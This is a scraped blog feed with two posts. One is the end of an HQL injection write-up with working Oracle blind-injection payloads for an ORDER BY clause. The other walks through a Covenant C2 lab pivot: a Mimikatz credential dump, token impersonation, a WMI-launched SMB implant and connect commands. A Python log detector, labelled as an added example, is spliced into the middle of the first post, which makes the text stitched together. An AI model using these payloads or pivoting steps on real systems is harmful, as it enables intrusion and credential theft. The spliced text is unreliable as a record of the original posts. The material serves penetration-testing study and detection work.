<textarea cols="30" rows="2" style="height: 30px; width: 253px;">Dual is not mapped [from com.....</textarea></p><p>The moment, we realised that it is something different for which we need to come up with different payload, me and my "Partner in SQLI Crime" suited up 🤩<br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEeFenSXbvJVvIbPRUeiKGOgsFuCzLn-PKc1khqoeWww09PrHaWI9D4ioGzCkYGHo5SuLgqsLBQPxVzpv1HmVNuegJoVZi8YY1O3JIjVMD_pYkkW8prrvy-y5jDPWEfjTH6txPttjUtvQKECHl4M7p9DkruTFvDaSjqvUo6MLTfp1CKmbfYag6g7QK/s953/shop.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="721" data-original-width="953" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEeFenSXbvJVvIbPRUeiKGOgsFuCzLn-PKc1khqoeWww09PrHaWI9D4ioGzCkYGHo5SuLgqsLBQPxVzpv1HmVNuegJoVZi8YY1O3JIjVMD_pYkkW8prrvy-y5jDPWEfjTH6txPttjUtvQKECHl4M7p9DkruTFvDaSjqvUo6MLTfp1CKmbfYag6g7QK/s16000/shop.png" /></a></div><br /> <p></p><p><span style="color: #fcff01; font-size: x-large;"><u>Available research:</u></span></p><p>There is an awesome research presented by "Mikhail Egorov" regarding the exploitation of the HQL injection attack in different type of database servers:<br /></p><p> <a href="https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm">https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm</a> <br /></p><p>For Oracle database, below mentioned payload can be used to exploit Boolean-based Blind injection </p><p><textarea cols="30" rows="2" style="height: 27px; width: 565px;">AND NVL(TO_CHAR(DBMS_XMLGEN.getxml('Inline_SQL_query_goes_here')),'1')!='1'</textarea></p><p></p><p>The web application responds with different HTTP content (depends on the true/false codition)<span style="font-size: large;"><br /></span></p><p><u><span style="color: #fcff01; font-size: x-large;">Limitation in this case</span><span style="font-size: 
x-large;"> <br /></span></u></p><p>In my case, the limitation was the following:<br /></p><ul style="text-align: left;"><li><span>The available payload converts the output of the inline SQL query and compares it with the value 1, whereas the "Order by" clause does not allow the use of comparison operators such as <,>,= outside a function or inline SQL query.</span><br /></li></ul><p>Since user data is passed to the "Order by" clause, which has some specific rules, the payload has to respect the following:</p><p>
<span style="color: #f1c232;">Syntax which is supported:- </span></p><p><b> </b><textarea cols="30" rows="5" style="height: 61px; width: 485px;"> ORDER BY (inline SQL query)
or
ORDER BY some_function(inline SQL query)</textarea></p><p></p><p></p><p><span style="color: #f1c232;">Syntax which is not supported:-<b> </b></span></p><p><b> </b><textarea cols="30" rows="5" style="height: 60px; width: 486px;"> ORDER BY (inline SQL query) = some_value
or
ORDER BY some_function(inline SQL query) = some_value</textarea></p><p><span style="color: #fcff01; font-size: x-large;"><u>Key to kingdom:</u></span></p><p>To exploit this vulnerable endpoint, I came up with the following pointers.<br /></p><p><span style="color: #ffa400;">👉</span> The Select statement will not be evaluated if the condition is false:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvwjgMwtqlONczqPaDrsqiDP7d3SPpKLbHZQnFyHfKvbdpH8a3VSDzHX_GqVcf3ovnhNqqUwHFOUkwmORQh2oNxCWlUB8FTiCn2GWopYsQ9-aYfMj077-jFvCDPi03U6GKfPjlmAAjH4E0B5ILSVPrs-5SOYhCGS4FPWOOArKlvAQkPU7oofE8cxOK/s503/eval1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="401" data-original-width="503" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvwjgMwtqlONczqPaDrsqiDP7d3SPpKLbHZQnFyHfKvbdpH8a3VSDzHX_GqVcf3ovnhNqqUwHFOUkwmORQh2oNxCWlUB8FTiCn2GWopYsQ9-aYfMj077-jFvCDPi03U6GKfPjlmAAjH4E0B5ILSVPrs-5SOYhCGS4FPWOOArKlvAQkPU7oofE8cxOK/s16000/eval1.png" /></a></div><br /><p><span style="color: #ffa400;">👉</span> The Select statement will be evaluated if the condition is true:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFMeNyQ6mNpiqQFX9U7Cy-8NljxmGF3Fmc9M3U_1qxyWcy2_om8U2ZTXjonqV-yU9-Mg5rREQujKT4p-Xd6rGj4SbmRV-aOQHA4mK0eFCGmIlsnd9RYC6fsiAhHs-rdh3mmHdm-hF2fxXWuSSaKwaG8OExmbI2vaMHQFujqKumYxVzrpAh9r31IXFK/s512/eval2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="335" data-original-width="512" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFMeNyQ6mNpiqQFX9U7Cy-8NljxmGF3Fmc9M3U_1qxyWcy2_om8U2ZTXjonqV-yU9-Mg5rREQujKT4p-Xd6rGj4SbmRV-aOQHA4mK0eFCGmIlsnd9RYC6fsiAhHs-rdh3mmHdm-hF2fxXWuSSaKwaG8OExmbI2vaMHQFujqKumYxVzrpAh9r31IXFK/s16000/eval2.png" /></a></div><p><span style="color: #fcff01; font-size: x-large;"><u>Exploitation - Exception for the win</u></span><span style="font-size: large;"> 🤘😎🤘:</span></p><p>For exploitation, I will:</p><p><span style="color: #ffa400;">👉</span> Inject inline queries which raise an exception when the condition is true<br /><span style="color: #ffa400;">👉</span> Raise the exception with a trick such as '<span style="color: #fcff01;">division by zero</span>', or<br /><span style="color: #ffa400;">👉</span> Use a function which complains about an invalid format argument, such as the <span style="color: #fcff01;">To_date()</span> function<br /></p><p>Below mentioned is the inline query based on the '<span style="color: #fcff01;">division by zero</span>' approach:</p><p><textarea cols="30" rows="2" style="height: 27px; width: 565px;">(SELECT 1/0 FROM dual where true/false_condition)</textarea></p><p>And this one is having the <span style="color: #fcff01;">To_date()</span> function with an invalid format:</p>
<textarea cols="30" rows="2" style="height: 27px; width: 565px;">(SELECT TO_DATE(1337, 'b0x') FROM dual where true/false_condition)</textarea>
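The two exception-raising inline queries above, the box()/polygon()-style casts from the PostgreSQL post earlier in this feed, and the XDBURITYPE() path errors from the Oracle post all leave characteristic error text behind in database and application logs, which is what a defender can alert on. The detector below is an added example and not code from the original posts; its one-line log format (client, endpoint, message), the endpoint names and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Error signatures produced when the techniques in these posts reach the database:
# PostgreSQL refusing to cast the leaked text to a geometric type (the value it
# was given is echoed back in quotes), and Oracle raising the exception the blind
# ORDER BY probe relies on (ORA-01476 division by zero, ORA-01821 bad TO_DATE
# format) or the path error XDBURITYPE() raises (ORA-31001).
PG_GEOM_CAST = re.compile(
    r'invalid input syntax for type (box|polygon|path|point|lseg|circle): "(?P<leaked>[^"]*)"'
)
ORACLE_PROBE = re.compile(r'\b(?P<code>ORA-01476|ORA-01821|ORA-31001)\b')

# Constructed log layout for this example: "<client_ip> <endpoint> <message>".
# Real PostgreSQL/Oracle/app logs need their own prefix parsing in place of this.
LINE = re.compile(r'^(?P<client>\S+) (?P<endpoint>\S+) (?P<msg>.*)$')


def classify(message):
    """Return (family, detail) for a message matching one of the signatures above,
    or None.  For PostgreSQL the detail is the value the DB echoed back, i.e. the
    data that was just exfiltrated; for Oracle it is the ORA code."""
    m = PG_GEOM_CAST.search(message)
    if m:
        return "postgresql-geometric-cast", m.group("leaked")
    m = ORACLE_PROBE.search(message)
    if m:
        return "oracle-exception-probe", m.group("code")
    return None


def analyse(lines, threshold=3):
    """Group matching lines by (client, endpoint) and report every group that
    reached `threshold` hits, together with the values PostgreSQL leaked."""
    hits = defaultdict(lambda: {"count": 0, "families": set(), "leaked": []})
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue  # not in the expected layout; skip rather than guess
        c = classify(m.group("msg"))
        if c is None:
            continue  # ordinary error, e.g. a bad integer from a typo
        family, detail = c
        entry = hits[(m.group("client"), m.group("endpoint"))]
        entry["count"] += 1
        entry["families"].add(family)
        if family == "postgresql-geometric-cast":
            entry["leaked"].append(detail)
    return {
        key: {"count": e["count"], "families": sorted(e["families"]), "leaked": e["leaked"]}
        for key, e in hits.items()
        if e["count"] >= threshold
    }


# Constructed sample: one client walking an admins endpoint with the box()/polygon()
# payload family, one client hitting a sortable listing with the exception tricks,
# and a benign client whose single integer typo must not be reported.
SAMPLE_LOG = [
    '10.0.0.5 /api/admins ERROR: invalid input syntax for type box: "postgres"',
    '10.0.0.5 /api/admins ERROR: invalid input syntax for type box: "app_db"',
    '10.0.0.5 /api/admins ERROR: invalid input syntax for type polygon: "admins"',
    '10.0.0.9 /shop/list ORA-01821: date format not recognized',
    '10.0.0.9 /shop/list ORA-01476: divisor is equal to zero',
    '10.0.0.9 /shop/list ORA-01821: date format not recognized',
    '10.0.0.9 /shop/list ORA-31001: Invalid resource handle or path name "/ADMINS"',
    '10.0.0.7 /api/admins ERROR: invalid input syntax for type integer: "abc"',
]

if __name__ == "__main__":
    for (client, endpoint), finding in analyse(SAMPLE_LOG).items():
        print(client, endpoint, finding)
```

The leaked values are kept in the report so that incident response knows what the database already disclosed, not just that probing happened.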
<p>Let's observe and confirm the behaviour of inline query having <span style="color: #fcff01;">To_date()</span> function with invalid format.</p><p>Inline SQL query with true condition was executed and Oracle database raised an error because 'b0x' is not a valid date format:</p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2UF2Fgx-avQhhlMlB5T9iXISdOKfZORYFNdVNwIpsrVY-fBk5Xu3Gq4U0qfjCvR5UJFFMyFzBpIySXAn6OR9giHyrup7UZw4bBCRvWLNll3MqYcuyEMgnyvHOu5bdbD8AA967-5fpPobDeqwtEteA1SwS9pHVFbzEG5_FKn5B-q-f1XCPiL_ejtQl/s597/date.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="274" data-original-width="597" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2UF2Fgx-avQhhlMlB5T9iXISdOKfZORYFNdVNwIpsrVY-fBk5Xu3Gq4U0qfjCvR5UJFFMyFzBpIySXAn6OR9giHyrup7UZw4bBCRvWLNll3MqYcuyEMgnyvHOu5bdbD8AA967-5fpPobDeqwtEteA1SwS9pHVFbzEG5_FKn5B-q-f1XCPiL_ejtQl/s16000/date.png" /></a></div><p>Now, let's use this inline query in the existing payload and construct a final payload which can exploit HQL injection for our case:</p><p>👉True condition payload:<br /></p><p></p><pre><code class="hljs sql"></code></pre><p>
<textarea cols="30" rows="2" style="height: 31px; width: 720px;">ASCII(DBMS_XMLGEN.getxml('SELECT TO_DATE(1337, ''b0x'') FROM dual where user=''Database_User'''))</textarea> </p><p> 👉False condition payload:</p><p></p><pre><code class="hljs sql"></code></pre>
<textarea cols="30" rows="2" style="height: 27px; width: 733px;">ASCII(DBMS_XMLGEN.getxml('SELECT TO_DATE(1337, ''b0x'') FROM dual where user=''Random_String'''))</textarea> <p>With the false payload no row is selected, so TO_DATE() is never evaluated and the statement completes normally. The difference between the two responses is the oracle for the blind injection.</p><p> We have reached the end of the blog post 😎</p><p>I would like to say "Thank you" to <a href="https://twitter.com/irsdl" target="_blank">@Soroush Dalili</a> sir and <a href="https://twitter.com/NomanRiffat" target="_blank">@Noman Riffat</a> bhai ji who helped me a lot during the exploitation of this injection.</p><p>./init 0<br /></p><p> </p>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-22713482939198589492022-07-10T16:09:00.014+05:302023-11-22T11:25:44.621+05:30Covenant C2 for OSCP AD lab - Part 2<p> Hello all,<span></span></p><a name='more'></a>In this blog post, I am going to demonstrate how to pivot inside the private network and connect to an intranet based machine using the Covenant C2 framework.<p></p><p>For the basic setup, please have a look at part 1 of this blog post series.</p><p></p><h1 style="text-align: left;"><span style="font-size: x-large;"><span style="color: #ffa400;"><span style="font-weight: normal;"><u>AD environment setup and pivoting scenario:</u></span></span></span></h1><p>I have 2 machines in my current AD environment:</p><p><span style="color: white;">1.</span> <span style="color: white;">Workstation-PC (Machine A)</span>: 172.20.10.9, 192.168.56.111</p><p><span style="color: white;">2. WIN-A08PEI13CFI (Machine B)</span>: 192.168.56.110</p><p><span style="color: white;">Attacker Machine</span>: 172.20.10.10 (Covenant machine) <br /></p><p>We have access to <span style="color: white;">Workstation-PC</span> (Machine A) and want to gain access to <span style="color: white;">WIN-A08PEI13CFI</span> (Machine B), but direct access to <span style="color: white;">WIN-A08PEI13CFI </span>from the attacker machine is not possible: it sits on the 192.168.56.x network, which only Machine A can reach.</p><p>I am assuming that we have either <span style="color: white;">impersonated a user</span> or <span style="color: white;">got credentials</span> of a user who has access to machine <span style="color: white;">WIN-A08PEI13CFI</span>. </p><p>By impersonating the user session or using the creds, we will launch an <span style="color: white;">SMB based Grunt</span> on <span style="color: white;">Machine B</span> and then connect to that Grunt from the HTTP based Grunt that is running on <span style="color: white;">Machine A</span>, so Machine B never talks to the Covenant server directly.</p><p>The flow diagram is as follows:</p><div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoKl9JAk2P_fNcIVvxh6sYAM6KVko920pNPF-yCeagiEPNHnfSSmINJF98DKHbjePD3aq8FQlIXj4BYMq7AZseDhGJhZkBgIKveQ_vBWT-Hoj-5kv8ui15vzuhhs8aYteFV7PyLN0N0VyajV0UFSawMyeSqsf-ra4NVgUpiQdhGP4glXdSeQGGelbc/s1088/covenant.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="886" data-original-width="1088" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoKl9JAk2P_fNcIVvxh6sYAM6KVko920pNPF-yCeagiEPNHnfSSmINJF98DKHbjePD3aq8FQlIXj4BYMq7AZseDhGJhZkBgIKveQ_vBWT-Hoj-5kv8ui15vzuhhs8aYteFV7PyLN0N0VyajV0UFSawMyeSqsf-ra4NVgUpiQdhGP4glXdSeQGGelbc/s16000/covenant.png" /></a></div><p><br /></p><h1 style="text-align: left;"><span style="font-size: x-large;"><span style="color: #ffa400;"><span style="font-weight: normal;"><u>Pivoting using different Covenant 'Task':</u></span></span></span></h1><p>In Covenant, we have a number of Tasks with which we can pivot to an intranet based machine. For these Tasks, we are either going to impersonate a user or use creds to access Machine B.</p><p>We will try the following methods:</p><p></p><h3 style="text-align: left;"><span style="color: #fcff01;"><span><span style="background-color: black;"><span><span style="font-weight: normal;">1. Using plain text creds</span></span></span></span></span></h3><h4 style="text-align: left;"><span style="color: white;"><span style="background-color: black;"><span><span style="font-weight: normal;">a) WMIGrunt<br />b) WMICommand<br />c) PowerShellRemotingCommand<br />d) PowerShellRemotingGrunt <br /></span></span></span></span></h4><h3 style="text-align: left;"><span style="color: white;"><span style="background-color: black;"><span><span style="font-weight: normal;"><span style="color: #fcff01;">2. Using Impersonated user session</span><br /></span></span></span></span></h3><h4 style="text-align: left;"><span style="color: white;"><span style="background-color: black;"><span><span style="font-weight: normal;">a) WMIGrunt<br />b) PowerShellRemotingGrunt</span></span></span></span></h4><p><span style="color: white;">Creating HTTP listener</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj19dGp-cetL0gm5smlzHd2yU-sX9uO-K4Gj_q2HOAk6OspZcwlQlpwAKuA9ORjbKetmepU56WSCYn_CDmc7n5hH_3KrIcth33GqJNyfJwPJ56y7dyO9hLo7T77AAMddykNsy-9KJqTNzR-PqkfbfTH7IfYVJSLZIQXEVATvoHTfMI7Z5YX-qS8EsyP/s816/11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="816" data-original-width="777" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj19dGp-cetL0gm5smlzHd2yU-sX9uO-K4Gj_q2HOAk6OspZcwlQlpwAKuA9ORjbKetmepU56WSCYn_CDmc7n5hH_3KrIcth33GqJNyfJwPJ56y7dyO9hLo7T77AAMddykNsy-9KJqTNzR-PqkfbfTH7IfYVJSLZIQXEVATvoHTfMI7Z5YX-qS8EsyP/s16000/11.png" /></a></div><p></p><p>We have a Grunt connection from Machine A, whose external IP is 172.20.10.9:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJui5WuguaP0gZBvJZA6bFOkkZTu-iz4qd4oJ1iPujlqduSjJcPwHG6oW3-KPCdqGrQzvT0yMMLnWfj5VsHobcS5Le5AZtOnF5ERdrs22S3tU1oDE8v3N2DC8Wg98Ipm_UmKmfo1xjbSvOJHxUnhX5uxBT7esICtkvKTuCIeAYiyK5FlWJQ4tqvzW/s1334/13.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="786" data-original-width="1334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJui5WuguaP0gZBvJZA6bFOkkZTu-iz4qd4oJ1iPujlqduSjJcPwHG6oW3-KPCdqGrQzvT0yMMLnWfj5VsHobcS5Le5AZtOnF5ERdrs22S3tU1oDE8v3N2DC8Wg98Ipm_UmKmfo1xjbSvOJHxUnhX5uxBT7esICtkvKTuCIeAYiyK5FlWJQ4tqvzW/s16000/13.png" /></a></div><br /> This machine has 2 interfaces and the second one is connected to the intranet:<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0a2BnoKagYYwiROK4sqGYrSLp73NIuMsz59huDnPKo_BZ6UBExC8pEW5v0YEVLiu3z8l4JAjMR_WrO9cCFlaBA_8IGBE9qgUybHfgTjBtv6YOoVvUBGBDsbTUKxaTvUx9SwS2R8sy3edO-CXLSsaLMe41ic8ibYTMylj8EiAA191WgKMta4NXlQ2g/s967/14.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="724" data-original-width="967" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0a2BnoKagYYwiROK4sqGYrSLp73NIuMsz59huDnPKo_BZ6UBExC8pEW5v0YEVLiu3z8l4JAjMR_WrO9cCFlaBA_8IGBE9qgUybHfgTjBtv6YOoVvUBGBDsbTUKxaTvUx9SwS2R8sy3edO-CXLSsaLMe41ic8ibYTMylj8EiAA191WgKMta4NXlQ2g/s16000/14.png" /></a></div><p></p><p>There is a machine in the intranet which has a private IP and is accessible through Machine A only:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigRikhlTLm86bT7e2SwPktVuVPJ-NDLtod5S9DjntyUckPYo0PlLEfU79I8x0iJPwUitaznBapOcDdfz4x4W19L9LRInlplDhxiFAAfoX2wWodtrlsBpB8uVsYYTuALLVFYNLIBHv0kD67yQPeNfa0iBDPyBlz38Q6KmP-eIOBuGCu1fObnIooAb8T/s888/15.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="578" data-original-width="888" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigRikhlTLm86bT7e2SwPktVuVPJ-NDLtod5S9DjntyUckPYo0PlLEfU79I8x0iJPwUitaznBapOcDdfz4x4W19L9LRInlplDhxiFAAfoX2wWodtrlsBpB8uVsYYTuALLVFYNLIBHv0kD67yQPeNfa0iBDPyBlz38Q6KmP-eIOBuGCu1fObnIooAb8T/s16000/15.png" /></a></div><p></p><p>How to reach <span style="color: white;">Machine B</span> using<span style="color: white;"> Machine A</span>?</p><p></p><p>Well
we have the SMB Grunt in Covenant, which can help us. From Machine A, we will launch an SMB based Grunt on Machine B and then connect to that SMB Grunt. The SMB Grunt does not call back to the Covenant server; it listens on a named pipe and its traffic is relayed through the HTTP Grunt on Machine A, which is why Machine B needs no route to 172.20.10.10. </p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">1. Dumping plain text creds<br /></span></span></span></h3><p>Using the Mimikatz task, dump the credentials of the logged-in users:<br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsu0p_aKg-rWfTdq2Jrfhn8ydHbyHnOHHMASiibGB8zG_H_sOwzF-fFCXj5ACxxgUGh3Oyr85Se1jQUQChKaVsrCvQij5egTMXk17_Uncwrz4zhJQhYNi-ka1yawQeZiWtH3bawUXnvdwSgp0blOIRDYmBAkJnOcqUrXVtHi6af4iUyVst0QVWnbsW/s848/17.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="657" data-original-width="848" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsu0p_aKg-rWfTdq2Jrfhn8ydHbyHnOHHMASiibGB8zG_H_sOwzF-fFCXj5ACxxgUGh3Oyr85Se1jQUQChKaVsrCvQij5egTMXk17_Uncwrz4zhJQhYNi-ka1yawQeZiWtH3bawUXnvdwSgp0blOIRDYmBAkJnOcqUrXVtHi6af4iUyVst0QVWnbsW/s16000/17.png" /></a></div><p></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">1. (a) WMIGrunt (using dumped creds)</span></span></span></h3><p><span style="color: white;"><b>Configure launcher</b></span><br /></p><p>Let's configure the PowerShell based Launcher in the Launchers section. Note that I have selected <span style="color: white;">ImplantTemplate</span> as <span style="color: white;">GruntSMB</span> and <span style="color: white;">SMBPipeName </span>as <span style="color: white;">smbconnect_1</span>; the pipe name is what we will connect to later, so note it down:</p><p></p><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8gXxtAOsq4TviyKoYL4tbCT_i_nF3yBByvJWZk-8bViphXPVZgZB9paB6bjWLjc7joy4T6DJ2xpZfEu8Xv-8uCd9IovmttU5RfZQhmZrqZWy8qnYMsbvoQ6RphFuGm1WFWHzDDM1CWe0NgTSif5Yu_UhSnXmf-GjxSV2gHnCQYDlMF_YPR376Bkrw/s945/wmigrunt_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="696" data-original-width="945" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8gXxtAOsq4TviyKoYL4tbCT_i_nF3yBByvJWZk-8bViphXPVZgZB9paB6bjWLjc7joy4T6DJ2xpZfEu8Xv-8uCd9IovmttU5RfZQhmZrqZWy8qnYMsbvoQ6RphFuGm1WFWHzDDM1CWe0NgTSif5Yu_UhSnXmf-GjxSV2gHnCQYDlMF_YPR376Bkrw/s16000/wmigrunt_2.png" /></a></div><p><span style="color: #fcff01;">Make Token using extracted creds:</span> <br /></p><p>Now, we will make a token for the user with whose privileges we want to launch the SMB based Grunt on
the target machine. To do so, we use the <span style="color: white;">MakeToken</span> task. Specify the username, password and domain (use . as the domain if the user is a local account rather than a domain user). With the default logon type, the token only changes how the Grunt authenticates to the network (here, to Machine B); local actions on Machine A still run as the original user:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO4XyE6R02aD2jheSL53V9kMsmDXRLSCaLYDpWo0gKEpIOPLWi8rS_G372Q1vqOSr-ZP3NneXmw2mwWowqnzcGeDBRWO1wLYSsZPtrTmTAhn41gBUgU1JFLPJlY8Dd71lnWqBhEUsQh7OWcUmmEWAq8ymnYmTUl5QxLE5NHu64U1u69vt3lprkT0CG/s654/make%20token.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="616" data-original-width="654" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO4XyE6R02aD2jheSL53V9kMsmDXRLSCaLYDpWo0gKEpIOPLWi8rS_G372Q1vqOSr-ZP3NneXmw2mwWowqnzcGeDBRWO1wLYSsZPtrTmTAhn41gBUgU1JFLPJlY8Dd71lnWqBhEUsQh7OWcUmmEWAq8ymnYmTUl5QxLE5NHu64U1u69vt3lprkT0CG/s16000/make%20token.png" /></a></div><p></p><p>After clicking the Task button, we get a message like this:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCgkPaQmrJdhwOCE8W3L5jaPBK2V0fZuOFu5AXcoSmP1hNTUGR4KFYrZHL8pX-xMvmdXBiBneNe2WeWOmwMos7h_Q_bUwZBjAm6wbtLpQto-FYg35NCV_QP0_EMdNQYVC-PMVXEWAsCrGb-Huim1iFJZXZzmqGkmacdOt-Hct45m_2oObPfTyZ3sxS/s885/make%20token2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="92" data-original-width="885" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCgkPaQmrJdhwOCE8W3L5jaPBK2V0fZuOFu5AXcoSmP1hNTUGR4KFYrZHL8pX-xMvmdXBiBneNe2WeWOmwMos7h_Q_bUwZBjAm6wbtLpQto-FYg35NCV_QP0_EMdNQYVC-PMVXEWAsCrGb-Huim1iFJZXZzmqGkmacdOt-Hct45m_2oObPfTyZ3sxS/s16000/make%20token2.png" /></a></div><p> Now,
in the Tasks section, select <span style="color: white;">WMIGrunt </span>and specify the information such as ComputerName, Launcher, username, password and domain name. WMIGrunt creates the process on the target through WMI, so Machine B must accept DCOM/RPC from Machine A (TCP 135 plus a dynamic port) and the account needs local administrator rights there:<br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJBOH0C4EFzpzy_fGmC8CJ42jDxUhtcv5XCg5j6VJw9GR5uvhz21vlK4LyxUz601q206FQJNFA3CYgf72Pf_1lH2zpB7xrAv42AEL2M1HNdYHwfbXzQxZhhU1aTU3J-kjYsZvUnzur9DPNQmTsuu3zYkqxUOBgNHznsMjfKaCQwkQta4KL5OTz7wXM/s659/wmigrunt_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="623" data-original-width="659" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJBOH0C4EFzpzy_fGmC8CJ42jDxUhtcv5XCg5j6VJw9GR5uvhz21vlK4LyxUz601q206FQJNFA3CYgf72Pf_1lH2zpB7xrAv42AEL2M1HNdYHwfbXzQxZhhU1aTU3J-kjYsZvUnzur9DPNQmTsuu3zYkqxUOBgNHznsMjfKaCQwkQta4KL5OTz7wXM/s16000/wmigrunt_1.png" /></a></div><p></p><p>After executing the task, we need to wait for it to finish:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwzN2oMAgLysBdLECQ02n6o4KAFmXCRMUoXG_aq6sIgG1XX70mj9bKuG1sgZHj8ELuETr394MBDaxpNwaG0SBrEwIqQDvL9lPYzNiEaHrslTy7CdTRDzQzPj-rjeDsZP_YIfD3f4ZIjAIn3Nt4ZaLELdWkBBFFhcqwASjqKDd5vLStjYPpzlLib0Og/s871/wmigrunt_active2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="130" data-original-width="871" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwzN2oMAgLysBdLECQ02n6o4KAFmXCRMUoXG_aq6sIgG1XX70mj9bKuG1sgZHj8ELuETr394MBDaxpNwaG0SBrEwIqQDvL9lPYzNiEaHrslTy7CdTRDzQzPj-rjeDsZP_YIfD3f4ZIjAIn3Nt4ZaLELdWkBBFFhcqwASjqKDd5vLStjYPpzlLib0Og/s16000/wmigrunt_active2.png" /></a></div><p></p><p>Let's connect to the SMB Grunt launched on the target machine. 
To do so, we run the Connect task from the Machine A Grunt, which opens the named pipe \\target\pipe\SMBPipeName over SMB (TCP 445):</p><textarea style="height: 28px; margin: 0px; width: 350px;">connect target_machine_hostname SMBPipeName</textarea><p>in my case it was </p><textarea style="height: 28px; margin: 0px; width: 300px;">connect WIN-A08PEI13CFI smbconnect_1</textarea><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV4JP7ryqgubwym0omeymr4KQGP8QBqEa9Y5-8kIAwFTRCrFaACUtrdVEo5K3QFOxYTwX0FOo9m_QgK2WiI6eJ4mYtnlcp9tjTp6P6cH850yd_wlHtxQ5LFh0C8MqA0ZhWma2MyvGOdVOXqKxVp1g0ukowxq20RYLVUvhN0hIUOy1hN7gCAAkoNRZH/s1299/wmigrunt_active.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="470" data-original-width="1299" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV4JP7ryqgubwym0omeymr4KQGP8QBqEa9Y5-8kIAwFTRCrFaACUtrdVEo5K3QFOxYTwX0FOo9m_QgK2WiI6eJ4mYtnlcp9tjTp6P6cH850yd_wlHtxQ5LFh0C8MqA0ZhWma2MyvGOdVOXqKxVp1g0ukowxq20RYLVUvhN0hIUOy1hN7gCAAkoNRZH/s16000/wmigrunt_active.png" /></a></div><br />We got a connection from <span style="color: white;">Machine B</span> as well. 
